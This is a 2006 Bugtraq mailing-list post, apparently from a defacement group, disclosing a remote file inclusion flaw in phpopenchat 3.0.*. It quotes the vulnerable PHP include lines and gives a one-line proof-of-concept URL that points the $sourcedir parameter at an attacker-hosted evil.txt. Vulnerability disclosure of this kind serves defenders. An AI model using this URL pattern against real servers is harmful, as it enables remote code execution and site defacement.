WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
From: stormhacker@xxxxxxxxxxx
Date: 6 Sep 2006 19:17:11 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[W]orld [D]efacers Team
--------------------Summary----------------

eVuln ID: WD23

Vendor:  phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

Follow-Ups:
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
  - From: Carsten Eilers

Prev by Date: Microsoft confirmed Word 0-day vulnerability
Next by Date: Details for BID 18428
Previous by thread: Re: Microsoft confirmed Word 0-day vulnerability
Next by thread: Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
Index(es):
- Date
- Thread